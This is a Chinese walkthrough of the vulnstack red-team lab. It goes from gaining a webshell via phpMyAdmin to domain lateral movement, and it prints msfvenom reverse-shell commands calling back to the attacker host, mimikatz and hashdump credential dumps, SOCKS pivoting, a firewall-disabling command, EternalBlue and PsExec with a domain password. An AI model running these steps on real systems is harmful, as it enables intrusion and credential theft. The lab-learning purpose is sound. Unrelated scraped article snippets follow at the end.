802.1Q

vulnstack（一）红日靶场复现

说明：关于该复现中的问题欢迎vx交流：Bestboysendit

目录
一、环境配置：
二、内网getshell
3-（1）phpmyadmin
3-（2）备份文件：
三、内网-连接
1、基于MSF
2、基于Cobalt Strike
3、CS与kali联动
（1）CS下的会话传给MSF
（2）MSF下的会话传给CS
四、内网-横向
4.1 搭建隧道
4.1.1 使用CS搭建隧道
4.1.2 使用msf搭建隧道
4.2内网信息收集
五、内网攻击
1、MS08-067
2、SMB远程桌面口令猜测
3、RPC DCOM 服务漏洞
4、ms17-010
psexec攻击
域hash传递攻击

一、环境配置：

2008：10.10.10.3 域控主机
win7：10.10.10.2 host-only+nat 192.168.3.11
2k3：10.10.10.4 域控客户端

kali：192.168.3.136

win7开启phpstudy，下载的靶机桌面上没有快捷方式，用everything搜索一下。

二、内网getshell

1、nmap开启扫描：
经排查144的地址为所需地址，且80端口是开启的

 nmap 192.168.3.0/24                                                                
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 09:01 EDT
Nmap scan report for 192.168.3.144
Host is up (0.010s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1030/tcp open  iad1
3306/tcp open  mysql

Nmap done: 256 IP addresses (4 hosts up) scanned in 4.73 seconds

2、访问192.168.3.144的80端口：
phpinfo() 页面,且留有绝对路径，管理邮箱：

猜密码：root/root 弱口令

尝试使用file_into或日志写入webshell。
secure_file_priv的值为“空”时允许任意文件写入，为“null”时不允许任何写入。该值也可以为路径；

show global variables like "%secure%";

这里行不通：

3、御剑扫描后台：

3-（1）phpmyadmin
可以登录：root/root

以下命令都是通过phpmyadmin界面执行
尝试通过慢日志写入shell：
①查询慢日志超时时间：10s

②set global slow_query_log = 1; 开启可更改

③set global slow_query_log_file = “c:\phpstudy\WWW\shell.php”;
修改日志的地址，
确认修改情况：

④注入：

select ';' or sleep(11);

⑤写入成功：

⑥写入一句话：

 select '' or sleep(11);

⑦菜刀连接：

3-（2）备份文件：
备份显示为：yxcms系统

①访问：

②在留言板中插入xss测试代码

③进入后台审核：

④模板文件是php文件，直接添加木马

⑤文件路径：…要根据之前所给的beifen.rar来确定位置：
思路：看一下与写入的shell.php模板文件在一起的其他文件名，然后去beifen.rar查找位置：

⑥连接：

三、内网-连接

1、基于MSF
01使用msfvenom生成payload文件
地址：kali地址，端口，随便写一个不冲突的

msf6 >  msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.3.136 lport=1234 -f exe -o eye2.exe
[*] exec: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.3.144 lport=6666 -f raw > eye.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1114 bytes
msf6 > ls
[*] exec: ls

arget    ctf      Documents  eye2.exe  Pictures  Templates
asd.exe  Desktop  Downloads  Music    Public    Videos
msf6 >
msf6 > pwd
[*] exec: pwd

/home/buna
msf6 >

02使用菜刀上传
到www目录下

03使用handler模块接收反弹模块，在1234端口上进行监听，访问shell.php，连接成功
下面地址也应该是kali的地址

04上线：

05提权：
这里直接是administrator，所有可以直接提到system，

meterpreter > getuid
Server username: GOD\Administrator
meterpreter >
meterpreter >
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
meterpreter > getuid
Server username: NT AUTH

ORITY\SYSTEM
meterpreter >

06获取密码：

Windows系统下的hash密码格式为：
用户名称:RID:LM-HASH值:NT-HASH值
NT-HASH hash生产方式：

将明文口令转换成十六进制的格式
转换成Unicode格式，即在每个字节之后添加0x00
对Unicode字符串作MD4加密，生成32位的十六进制数字串

eg：用户密码为test123
转换成十六进制的格式为74657374313233
转换成Unicode格式为7400650073007400310032003300
对字符串7400650073007400310032003300作MD4加密，结果为c5a237b7e9d8e708d8436b6148a25fa1

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY fd4639f4e27c79683ae9fee56b44393f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::


meterpreter >

04mimikatz
加载 mimikatz 模块，加载模块前需要先将meterpreter迁移到64位的进程，该进程也需要是system权限：

ps
migrate PID
load mimikatz
mimikatz_command -f sekurlsa::searchPasswords

meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.
meterpreter >

05 kiwi
load wiki
creds_all
这里不是很成功。。

11、远程桌面链接

06开启远程桌面：
run post/windows/manage/enable_rdp

07连接：

2、基于Cobalt Strike
给服务端程序执行权限

执行cs服务端程序，开启服务，ip是kali的ip，密码是123

重新打开一个终端，在kali上执行cs客户端程序，用户名随意，密码123

创建一个监听器，ip就是kali的ip

生成生成Web Delivery

选择刚刚创建的那个Listener

会生成一条命令，使用菜刀连接webshell，打开虚拟终端，输入这条命令

目标主机就上线了，你就可以使用cs对它进行操作啦

比如屏幕截图，右击连接->Explore->Screenshot，再点击上面的图片小图片进入屏幕截图视图（点击View-Screenshot也行），就能看到目标的屏幕截图了

收集信息：

使用 hashdump 和 logonpasswords 读内存和注册表密码，在 Credentials 模块下查看

2、使用mimikatz.exe程序
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords” exit

11、远程桌面链接
略

3、CS与kali联动
（1）CS下的会话传给MSF
使用msf监听模块，ip就是kali的ip，端口就是监听的端口，payload要和cs相同，然后运行，开始监听

①首先cobaltstrike创建监听器：

②在msf控制台执行如下操作：

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #payload_inject执行之后会在本地产生一个新的handler，设置为true表示不重复生成
set lhost xxxx                 #公网vps ip
set lport 14444                 #监听端口 
set session 1                   #派发session id
exploit

③得到shell：
点击要连接的会话->Spawn->选择上面的监听

（2）MSF下的会话传给CS

首先cobaltstrike创建监听器：

msf:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #payload_inject执行之后会在本地产生一个新的handler，设置为true表示不重复生成
set lhost xxxx                 #公网vps ip
set lport 14444                 #监听端口 
set session 1                   #派发session id
exploit

四、内网-横向

4.1 搭建隧道
4.1.1 使用CS搭建隧道
前提是仅通过CS拿到会话或者MSF拿到会话派送给CS
cs配置：
打开会话，输入socks 1234

进入代理视图，选中会话点击Tunnel，复制生成的文字

msf配置：
粘贴cs生成的命令 setg Proxies socks4:127.0.0.1:1234
setg ReverseAllowProxy true 允许反向代理

修改/etc/proxychains.conf文件

4.1.2 使用msf搭建隧道
该部分可直接跳过到4.2部分，因为这里失败了
横向渗透前，先将该web服务器配置为代理服务器当作跳板机。
msf+proxychains

可用msf直接搭建sock隧道：
进入session，自动创建路由：

run post/multi/manage/autoroute


meterpreter > run post/multi/manage/autoroute

[!] SESSION may not be compatible with this module.
[*] Running module against STU1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 192.168.3.0/255.255.255.0 from host's routing table.
meterpreter >

查看路由：
run autoroute -p


meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.10.0         255.255.255.0      Session 2
   169.254.0.0        255.255.0.0        Session 2
   192.168.3.0        255.255.255.0      Session 2

meterpreter >

退到上层，使用socks4a进行代理，端口与proxychains里设置一致即可：
因为kali2021没有sock4a选项，故停止继续
background
use auxiliary/server/socks4a
run
在这里插入图片描述
run后可用jobs查看任务是否执行：

jobs
在这里插入图片
配置proxychains：

vi /etc/proxychains.conf
在这里插入图片描述
全局代理测试：
在这里插入图片描述
浏览器代理测试：
在这里插入图片描述
cobaltstrike + proxifer

cs开启socks代理：
在这里插入图片描述
自定义端口：
在这里插入图片描述

proxifer设置：
在这里插入图片描述
测试：
在这里插入图片描述

4.2内网信息收集
该部分承接4.1.1
使用msf的扫描模块扫描内网主机

使用msf内置模块进行存活主机探测

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机

内网主机端口扫描

proxychains nmap -Pn -sT 172.20.10.10
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(默认扫描1-10000)
内网主机服务探测
auxiliary/scanner/ftp/ftp_version            #发现内网ftp服务，基于默认21端口
auxiliary/scanner/ssh/ssh_version            #发现内网ssh服务，基于默认22端口
auxiliary/scanner/telnet/telnet_version      #发现内网telnet服务，基于默认23端口
auxiliary/scanner/dns/dns_amp                #发现dns服务，基于默认53端口
auxiliary/scanner/http/http_version          #发现内网http服务，基于默认80端口
auxiliary/scanner/http/title                 #探测内网http服务的标题
auxiliary/scanner/smb/smb_version            #发现内网smb服务，基于默认的445端口   
auxiliary/scanner/mssql/mssql_schemadump     #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump     #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version        #发现内网mysql服务，基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner            #发现内网RDP服务，基于默认3389端口
auxiliary/scanner/redis/redis_server         #发现内网Redis服务，基于默认6379端口
auxiliary/scanner/db2/db2_version            #探测内网的db2服务，基于默认的50000端口
auxiliary/scanner/netbios/nbname             #探测内网主机的netbios名字

下面内容部分因为需要msf的会话，没有复现。环境中内网网段为10.10.10.0 案例中给的192.168.52.0

补丁信息：

安装软件信息

路由信息
添加路由，使得 MSF 能够通过 Win7 路由转发访问192.168.52.0 网段

arp扫描52网段

关闭防火墙，再使用nmap扫描
netsh advfirewall set allprofiles state off

扫描太慢，，，直接借图：

使用nmap的vuln漏洞扫描脚本进行扫描

Nmap scan report for 10.10.10.2
Host is up (0.00067s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.2
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.10.2:80/
|     Form id:
|     Form action: /l.php#bottom
|
|     Path: http://10.10.10.2:80/l.php
|     Form id:
|_    Form action: /l.php#bottom
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /phpinfo.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /phpMyAdmin/: phpMyAdmin
|_  /PHPMyAdmin/: phpMyAdmin
| http-phpself-xss:
|   VULNERABLE:
|   Unsafe use of $_SERVER["PHP_SELF"] in PHP files
|     State: VULNERABLE (Exploitable)
|       PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|
|     Extra information:
|
|   Vulnerable files with proof of concept:
|     http://10.10.10.2/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
|   Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.2
|     References:
|       https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_      http://php.net/manual/en/reserved.variables.server.php
| http-sql-injection:
|   Possible sqli for queries:
|     http://10.10.10.2:80/l.php?act=Function%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?act=phpinfo%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?act=Function%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?act=phpinfo%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|     http://10.10.10.2:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
|   Possible sqli for forms:
|     Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|       funName
|     Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|_      funName
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1029/tcp open  ms-lsa
1030/tcp open  iad1
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: SMB: Failed to receive bytes: TIMEOUT

Nmap done: 1 IP address (1 host up) scanned in 140.66 seconds

使用msf辅助模块进行扫描，查看是否存在ms17-010漏洞

在cs上使用目标机器上的nmap，对内网其他主机进行扫描
注：有时beacon连接会执行不了命令，或者连接断开，或者制作不了scripted web delivery这时要重启一下cs服务器。
主机10.10.10.4信息

beacon> shell nmap --script=vuln 10.10.10.4
[*] Tasked beacon to run: nmap --script=vuln 10.10.10.4
[+] host called home, sent: 60 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-28 11:30 ?D1ú±ê×?ê±??

[+] received output:
Nmap scan report for 10.10.10.4
Host is up (0.00s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
135/tcp  open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
777/tcp  open  multiling-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open  NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1026/tcp open  LSA-or-nterm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1038/tcp open  mtqp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1044/tcp open  dcutility
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6002/tcp open  X11:2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7001/tcp open  afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7002/tcp open  afs3-prserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8099/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:11:06:63 (VMware)

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 127.98 seconds

主机10.10.10.3信息

msf6 > nmap --script=vuln 10.10.10.3
[*] exec: nmap --script=vuln 10.10.10.3

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 23:30 EDT
Nmap scan report for 10.10.10.3
Host is up (0.0011s latency).
Not shown: 985 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
|_sslv2-drown:
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_sslv2-drown:
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF

Nmap done: 1 IP address (1 host up) scanned in 62.75 seconds

五、内网攻击

1、MS08-067
使用cs将msf带入内网后，使用ms08-067攻击模块攻击内网主机，注意使用的是反向代理，所以这里payload需要使用正向

搞不进去，，，

2、SMB远程桌面口令猜测
使用msf的smb口令猜测模块，配置参数用于smb口令爆破

3、RPC DCOM 服务漏洞
漏洞原理：
微软修改 dcerpc 框架后形成自己的 RPC 框架来处理进程间的通信。微软的 RPC 框架在处理 TCP/IP 信息交换过程中存在的畸形消息时，未正确处理，导致缓冲区溢出漏洞；
此漏洞影响使用 RPC 框架的 DCOM 接口，DCOM 接口用来处理客户端机器发送给服务器的 DCOM 对象激活请求，如 UNC 路径
漏洞利用：

4、ms17-010

```handlebars
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.10.4       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted

: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.10.10.4       no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > run

关掉防火墙才可以拿到会话：

5、psexec攻击

内网中，最总要的还是域管理员账号，有了域管理员账号后，可以使用该域管理员账号密码利用 psexec 登录域内任何一台开启了admin$共享(该共享默认开启) 的主机。
下载地址：
pstools:https://download.sysinternals.com/files/PSTools.zip

psexec.exe \10.10.10.4 -u god\administrator -p hongrisec@2019 cmd
这里没开启

PS F:\security\内网\PSTools> .\PsExec.exe  \\10.10.10.4 -u god\administrator -p hongrisec@2018 cmd

PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

Couldn't access 10.10.10.4:
找不到网络路径。

Make sure that the default admin$ share is enabled on 10.10.10.4.
PS F:\侠之大者，为国为民\内网\PSTools>

六、总结：

1、整体比较简单，漏洞都可以用工具扫出来，只要工具用的到位！
2、可以作为整体流程演示：从外网发现漏洞——getshell——拿到会话——内网信息收集——内网攻击的流程都有！
3、msf+cs=yyds

你可能感兴趣的:(网络通信,ssh,linux,flask,网络安全)

解决finalshell，连接主机报错 Session.connect: java.net.SocketException: Connection reset 点动生态云 ssh 服务器桥接模式
出现问题：在清除缓存后已连接的端口有些输入命令按左右键有问题重新打开窗口提示连接主机报错Session.connect:java.net.SocketException:Connectionreset可能的原因：1.防火墙或安全组配置问题：如果远程服务器上的防火墙或安全组配置阻止了SSH连接，会出现这种情况。2.SSH服务未启用：如果远程服务器上没有启动SSH服务，就无法建立SSH连接。3.SSH
flask搜索mysql_数据库|Flask实现简单搜索功能科技松鼠会 flask搜索mysql
数据库|Flask实现简单搜索功能2021-01-16问题描述用Flask实现简单搜索功能主要是通过form的方式传值，再到数据库中查询。下面是数据库的内容，主要是实现对content进行模糊匹配。图1数据库内容解决方案1.首先打开pycharm，构建一个最简单的flask应用。#search.pyfromflaskimportFlaskapp=Flask(__name__)@app.route(
微信小程序如何制作美化一个商铺页面(内附解析) 练习剑魔两年半微信小程序前端小程序 javascript
最终的样式像这样的一个界面它是如何实现的呢？相信这是很多初学者的问题。那么请看下文：首先现在wxml中输入以下代码//第一个父view//第一个父view中的第一个子view//第一个父view中的第二个子view{{item.name}}电话：{{tools.splitPhone(item.phone)}}地址：{{item.address}}营业时间：{{item.businessHours}
C#使用实体类Entity Framework Core操作mysql入门：从数据库反向生成模型2 处理连接字符串初级代码游戏 dotnet和C#数据库 mysql EntityFramework
初级代码游戏的专栏介绍与文章目录-CSDN博客我的github：codetoys，所有代码都将会位于ctfc库中。已经放入库中我会指出在库中的位置。这些代码大部分以Linux为目标但部分代码是纯C++的，可以在任何平台上使用。源码指引：github源码指引_初级代码游戏的博客-CSDN博客本文接上一篇：C#使用实体类EntityFrameworkCore操作mysql入门：从数据库反向生成模型-C
RK3588 Ubuntu系统编译南风知奇意 RK3588 ubuntu linux RK3588
1、建议配置1.1硬件配置编译Ubuntu开发环境硬件配置建议：64位CPUUbuntu20.04系统16GB内存250GB空闲空间用来编译1.2软件配置sudoaptupdatesudoapt-getinstallgitsshmakegcclibssl-devliblz4-tool\expectg++patchelfchrpathgawktexinfochrpathdiffstatbinfmt-
Linux服务器中指定版本jdk运行java项目 Louis yeap java 持续部署 linux
Linux中指定版本jdk运行java项目文章目录Linux中指定版本jdk运行java项目一、Linux中下载jdk（已下载跳过步骤一）二、配置环境变量（之前配过不影响）三、工作服务器跑项目（后台长期运行）总结一、Linux中下载jdk（已下载跳过步骤一）要在Linux系统上下载并安装JavaDevelopmentKit(JDK)，可以按照以下步骤进行操作。以下示例是基于OpenJDK，这是一个
前端安全：构建坚不可摧的Web应用防线 CodeToGym 前端安全
引言在数字化时代，网络安全已成为每个Web开发者必须面对的挑战。前端安全不仅关乎用户体验，更是保护用户数据和企业资产的关键。本文将深入探讨前端安全的多个维度，包括跨站脚本攻击（XSS）、跨站请求伪造（CSRF）、内容安全策略（CSP）以及HTTPS的实施，旨在帮助开发者构建更加安全的Web应用。跨站脚本攻击（XSS）概述跨站脚本攻击（XSS）是一种代码注入攻击，攻击者通过在网页中注入恶意脚本，利用
nvm安装linux SmartManWind chrome javascript 前端
1、下载安装包nvm-0.40.1.tar.gz2、解压文件tar-vxfnvm-0.40.1.tar.gz-C~/.nvm3、配置环境vi~/.bashrcexportNVM_DIR="$HOME/.nvm/nvm-0.40.1"[-s"$NVM_DIR/nvm.sh"]&&\."$NVM_DIR/nvm.sh"#Thisloadsnvm[-s"$NVM_DIR/bash_completion"
conda创建新虚拟环境——从无到有 S.T.A.R. 深度学习 tensorflow anaconda
自己租的GPU最近有点鱼的记忆，base配什么环境自己都忘了，所以自己开始学习如何创建并且配置一个新环境，当然这一切建立在andonate3安装完的前提下自己的配置：Linux系统，Xshell编译器创建环境condacreate-nyourEnvnamepython=3.6激活环境condaactivateyourEnvname就可以看到命令行的base换成了你的环境名可以开始installco
安全访问服务边缘（SASE）：网络新时代的安全与连接解决方案德迅云安全杨德俊网络安全分布式
随着信息技术的飞速发展，在企业纷纷拥抱数字业务的过程中，由于边缘计算、云服务、混合网络的逐渐兴起，使得本就漏洞百出的传统网络安全架构更加岌岌可危，企业和组织面临着日益复杂且多变的网络安全挑战。传统的网络安全解决方案往往难以应对这些挑战，而安全访问服务边缘（SASE）作为一种新型的网络安全模型，正逐渐受到业界的广泛关注和认可。下面我们就来简单了解下关于SASE的概念、特点、优势以及应用场景，对安全访
Anaconda 中更新当前环境的 Python 版本菌菌的快乐生活 python
要在Anaconda中更新当前环境的Python版本，可以按照以下步骤操作：打开AnacondaPrompt（Windows）或终端（macOS/Linux）。首先，你可以激活你想要更新的环境：condaactivateyour_environment_name将your_environment_name替换成你的环境名称。检查可用的Python更新版本：condasearchpython这将列出
linux离线安装gensim,安装gensim 宇宙探索未解之迷 linux离线安装gensim
pip3installjieba-0.39.zippip3installdocutils-0.15.2-py3-none-any.whlpip3installpython_dateutil-2.8.0-py2.py3-none-any.whlRequirementalreadysatisfied:six>=1.5pip3installbotocore-1.12.238-py2.py3-none-a
spi设备驱动开发 binn_chern 通用kernel spi
最近做spi设备驱动开发，查了很多资料，很少有说清楚使用设备树开发和传统开发的区别。很幸运还是找到了一篇：Linuxspi设备驱动：https://blog.csdn.net/liangzhenliang/article/details/46629155简单总结：1、使用设备树开发驱动，驱动可移植性高，和具体平台相关的信息可以通过设备树配置。2、传统设备驱动开发方式，和平台相关的参数，需要在驱动代
python对接rocketmq i_nekohuang python rocketmq
背景有对接java系统监听其相关资源同步新增的需求，该java系统使用了rocketmq。前置说明1、目前Python客户端仅支持Linux和macOS操作系统，暂不支持Windows系统2、rocketmq-client-python基于rocketmq-client-cpp进行包装，因此需要先编译出librocketmq.so3、文档中相关源码包和依赖包版本和github中README.md有
怎么升级python版本_linux机器升级python版本至2.7.13 weixin_39878646 怎么升级python版本
